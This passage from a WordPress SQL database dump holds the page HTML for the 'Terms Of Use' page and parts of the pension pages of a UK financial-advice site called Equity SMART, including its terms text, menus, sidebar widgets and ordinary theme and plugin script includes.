src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Stakeholder Pensions - Low-Cost Pension','Stakeholder pensions can offer greater flexibility than other pension types. A stakeholder pension may be a better option than other personal pensions.','publish','closed','closed','','stakeholder-pensions-low-cost-pension','','','2017-09-21 16:34:41','2017-09-21 16:34:41','',0,'http://www.equalitywalk.org.uk/stakeholder-pensions-low-cost-pension',0,'page','',0),(108,1,'2017-09-21 16:34:41','2017-09-21 16:34:41','<body class=\"page page-id-6347 page-template-default light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-6347 current_page_item menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"/></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Terms Of Use										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li>Terms Of Use</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:left;\">&#13;\n				<div id=\"post-6347\" class=\"post-6347 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Terms Of Use</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<p>Welcome to our website. If you continue to browse and use this website you are agreeing to comply with and be bound by the following terms and conditions of use, which together with our privacy policy govern Equity SMART relationship with you in relation to this website.The term ‘COMPANY’ or ‘us’ or ‘we’ refers to the owner of the website whose registered office is . The term ‘you’ refers to the user or viewer of our website.The use of this website is subject to the following terms of use:</p>&#13;\n<ul><li>The content of the pages of this website is for your general information and use only. It is subject to change without notice.</li>&#13;\n<li>Neither we nor any third parties provide any warranty or guarantee as to the accuracy, timeliness, performance, completeness or suitability of the information and materials found or offered on this website for any particular purpose. You acknowledge that such information and materials may contain inaccuracies or errors and we expressly exclude liability for any such inaccuracies or errors to the fullest extent permitted by law.</li>&#13;\n<li>Your use of any information or materials on this website is entirely at your own risk, for which we shall not be liable. It shall be your own responsibility to ensure that any products, services or information available through this website meet your specific requirements.</li>&#13;\n<li>This website contains material which is owned by or licensed to us. This material includes, but is not limited to, the design, layout, look, appearance and graphics. Reproduction is prohibited other than in accordance with the copyright notice, which forms part of these terms and conditions.</li>&#13;\n<li>Unauthorised use of this website may give rise to a claim for damages and/or be a criminal offence.</li>&#13;\n<li>From time to time this website may also include links to other websites. These links are provided for your convenience to provide further information. They do not signify that we endorse the website(s). We have no responsibility for the content of the linked website(s).</li>&#13;\n<li>Your use of this website and any dispute arising out of such use of the website is subject to the laws of the United Kingdom.</li>&#13;\n</ul></div>&#13;\n											</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:right;\"><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">&#13;\n										<img width=\"52\" height=\"34\" src=\"../wp-content/uploads/2013/02/photodune-2677721-big-ben-s2-e1361782596271.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"goverment report on care home costs uk\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">Will You Avoid Care Home Costs?</a>&#13;\n									<div class=\"meta\">&#13;\n										February 23rd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n									<div class=\"meta\">&#13;\n										February 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n									<div class=\"meta\">&#13;\n										February 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n									<div class=\"meta\">&#13;\n										January 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 31st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (2)</option><option class=\"level-0\" value=\"4\">Pensions  (4)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (8)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul></div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Terms Of Use','','publish','closed','closed','','terms-of-use','','','2017-09-21 16:34:41','2017-09-21 16:34:41','',0,'http://www.equalitywalk.org.uk/terms-of-use',0,'page','',0),(109,1,'2017-09-21 16:34:41','2017-09-21 16:34:41','<body class=\"page page-id-6844 page-template-default light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current_page_ancestor menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-6844 current_page_item menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business 